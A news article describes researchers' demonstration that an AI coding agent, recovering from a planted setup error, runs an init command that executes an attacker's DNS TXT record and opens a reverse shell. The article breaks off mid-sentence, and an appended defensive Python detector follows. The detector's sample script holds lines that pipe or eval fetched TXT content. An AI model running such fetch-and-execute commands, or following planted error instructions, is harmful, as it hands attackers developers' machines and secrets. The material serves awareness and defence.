Clean GitHub repo tricks AI coding agents into running malware
Techpivo News
This article was produced with the assistance of AI technology (gemini-grounded). It has been reviewed and edited by our editorial team to ensure accuracy and quality.
By Bill Toulas, June 27, 2026, 10:22 AM

An agentic coding tool tasked with cloning and setting up a seemingly benign GitHub repository could execute a malicious payload that remains invisible to security scanners, AI agents, and human reviewers.

Researchers at Mozilla's Zero Day Investigative Network (0DIN) AI security platform say that the compromise happens with "no exploit code, no warning, no suspicious command anyone had to approve." They demonstrated how an attacker could plant an interactive shell on a developer's device by using Claude Code to run a cloned project that contains no malicious code.

The new attack method relies on three components, each of which on its own represents no threat and raises no suspicion:

1. A clean-looking GitHub repository with standard setup instructions, such as installing dependencies and initializing the project (e.g., pip3 install -r requirements.txt, python3 -m axiom init).
2. The Python package is intentionally designed to refuse execution until it has been initialized; it generates an error instructing the user to execute python3 -m axiom init. Claude Code treats this as a normal setup issue and automatically runs the suggested command while attempting to recover from the error.
3. Executing python3 -m axiom init calls a shell script that retrieves a configuration value stored in a DNS TXT record controlled by the attacker and executes it as a command.

0DIN researchers explain that this approach requires no malicious component in the cloned repository, and the agent automates the entire attack chain, including a step that mimics a common user error.

If successful, the attacker would obtain a shell running with the developer's privileges, giving them access to environment variables, API keys, local configuration files, and the opportunity to establish persistence.

“Claude Code never decided to open a shell. It decided to fix an error. The reverse shell is thr
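As an added example (not code from the article or from 0DIN), here is a Python check a defender could run over a repository's setup and init scripts before an agent is allowed to execute them: it flags shell lines where DNS TXT record content can reach command execution, either directly or through a shell variable. The regex lists and the sample script are constructed for illustration and are not exhaustive.

```python
import re

# Shell commands that read DNS TXT records (constructed list, not exhaustive).
TXT_LOOKUP = re.compile(
    r"\b(?:dig\b[^|;&]*\bTXT\b|nslookup\b[^|;&]*-(?:type|query)=txt\b|host\b[^|;&]*-t\s+txt\b)",
    re.IGNORECASE,
)
# Sinks that would run whatever text the lookup returned.
EXEC_SINK = re.compile(
    r"\|\s*(?:ba|z|da)?sh\b|\beval\b|\b(?:ba|z)?sh\s+-c\b|\bsource\b|^\s*\$\(",
    re.IGNORECASE,
)


def dns_txt_exec_findings(script_text: str) -> list[dict]:
    """Flag lines where DNS TXT record content can flow into command execution.

    A lookup by itself (e.g. reading an SPF record) is not flagged; the finding is the
    record's text reaching eval, a piped shell, sh -c, source, or command position,
    on the same line or via a shell variable assigned from the lookup.
    """
    lines = script_text.splitlines()
    findings = []
    for idx, line in enumerate(lines, start=1):
        if not TXT_LOOKUP.search(line):
            continue
        if EXEC_SINK.search(line):
            findings.append({"source_line": idx, "sink_line": idx,
                             "reason": "TXT record content executed on the same line"})
            continue
        assigned = re.match(r"\s*(\w+)=", line)  # e.g. CFG=$(dig +short TXT ...)
        if not assigned:
            continue
        var = assigned.group(1)
        uses_var = re.compile(rf"\$\{{?{var}\b")
        for j in range(idx, len(lines)):  # only lines after the assignment
            if uses_var.search(lines[j]) and EXEC_SINK.search(lines[j]):
                findings.append({"source_line": idx, "sink_line": j + 1,
                                 "reason": f"TXT record stored in ${var} and later executed"})
                break
    return findings


# Constructed sample of an init hook: one benign SPF check, two lines that execute record content.
SAMPLE_SETUP_SH = """#!/bin/sh
set -e
spf=$(dig +short TXT example.com | grep spf1)
echo "mail policy: $spf"
CFG=$(dig +short TXT cfg.example.invalid)
eval "$CFG"
nslookup -type=txt hint.example.invalid | tail -1 | sh
"""

if __name__ == "__main__":
    for f in dns_txt_exec_findings(SAMPLE_SETUP_SH):
        print(f"line {f['source_line']} -> line {f['sink_line']}: {f['reason']}")
```

Running it on the sample reports the variable flow (line 5 to line 6) and the direct pipe on line 7, while the SPF lookup on line 3 is left alone.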